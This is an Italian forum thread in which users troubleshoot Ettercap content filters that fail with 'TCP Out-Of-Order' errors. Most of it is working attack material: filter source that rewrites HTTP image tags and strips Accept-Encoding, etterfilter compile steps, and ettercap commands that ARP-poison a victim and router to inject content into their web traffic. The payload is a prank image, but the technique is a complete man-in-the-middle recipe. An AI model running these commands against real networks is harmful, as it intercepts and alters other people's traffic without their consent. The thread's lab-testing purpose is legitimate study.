Ettercap filtri (TCP Out-Of-Order)

[raffaele]

Ragazzi non so voi che prove abbiate fatto ma a me Ettercap va! Vi dico come procedere.

Come prima cosa createvi un semplice filtro:

Code Select Expand

if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

poi da terminale date:

Code Select Expand

sudo etterfilter myfilter

ed infine

Code Select Expand

sudo ettercap -i eth0 -T -q -F filter.ef -M ARP // //

a questo punto basta navigare un po per vedere il teschio ;)

Riapro nuovamente il topic, aspetto il vostro responso.

[clshack]

io ho fatto uguale ma non va comunque per risolvere il problema di del tcp out of order, basta sostituire i " con i ' ad esempio:

Code Select Expand

replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");

Diventa:

Code Select Expand

replace("img src=", "img src='http://www.irongeek.com/images/jollypwn.png' ");

[raffaele]

Strano a me non da neanche l'errore "tcp out of order"... Comunque per essere sicuro durante la prova evita di usare wireshark o altri tools. Prova solo ettercap cosi come ti ho indicato io.

P.S. Ti consiglio di usare 2 PC differenti, magari entrambi collegati allo stesso router con cavo lan. Su BackBox fai partire Ettercap, sull'altro prova a navigare...

Eventualmente fai queste modifiche al filtro:

Code Select Expand

if (ip.proto == TCP && tcp.src == 80) {
  replace("http://immagine_da_sostituire.png", "http://www.irongeek.com/images/jollypwn.png");
  msg("Filter Ran.\n");
}

[Emilio]

Provai anche io, e postai appunto la stessa domanda nel blog di Alessio. Appena ho tempo riprovo per vedere se riesco a risolvere pure io.

[ghostdog]

Backbox, essendo basata su ubuntu e sul suo kernel, si porta a dietro un problema che non sono MAI stato in grado di risolvere..   >:( >:( >:( >:(

Ho chiesto ovunque e non ho avuto nessun supporto.. o soluzione...

Utlizzando il MITM di ettercap sulla mia rete , l’ARP poisoning và a buon fine, con wireshark sniffo la connessione full duplex, il target ha la tabella arp modificata, e sniffo perfettamente i dati che passano tra il computer poisonato e il gateway.

Quando però cerco di fare injecting con i filtri di ettercap (ad esempio su: http://www.irongeek.com/i.php?page=security/ettercapfilter oppure sul mio blog... ), ettercap attiva il filtro poichè nella condizione stampo un messaggio ;)  ma effettivamente i dati non vengono modificati (ad eempio il codice html ) . Wireshark mi avverte che c’e’ qualche problema nei pacchetti che dovrebbe injectare, con il messaggio [TCP Out-Of-Order] ho usato diverse volte con ettercap e ho provato diversi filtri, ma non funziona.

Mentre su backtrack... il tutto funziona ...

Suggerimenti ?

Naturalmente i setting sono ok  ;D

Prova questa opzione,,, forse aiuta !!


*** Crea un file  , copia il codice qui sotto  e salvalo come : " zero.filter " in Root Directory.


     if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(”Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(”zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(”img src=”, “img src=\”http://i40.tinypic.com/e653×3.gif” “);
replace(”IMG SRC=”, “img src=\”http://i40.tinypic.com/e653×3.gif” “);
msg(”Zero Image Is Pwning.\n”);
}


*** Apri la console e copia questo  :   etterfilter zero.filter -o zero.ef

*** Completa il tutto e copia qui :   /usr/local/share/ettercap



&&& adesso faciamo partire Ettercap da console , cosi :  ettercap -i wlan0 -Tq -M arp:remote /Victim ip/ /Router ip/ -F zero.ef



PS: Non prendo credito per questo tutorial, l;ho provato e funziona !


Happy Hacking
GD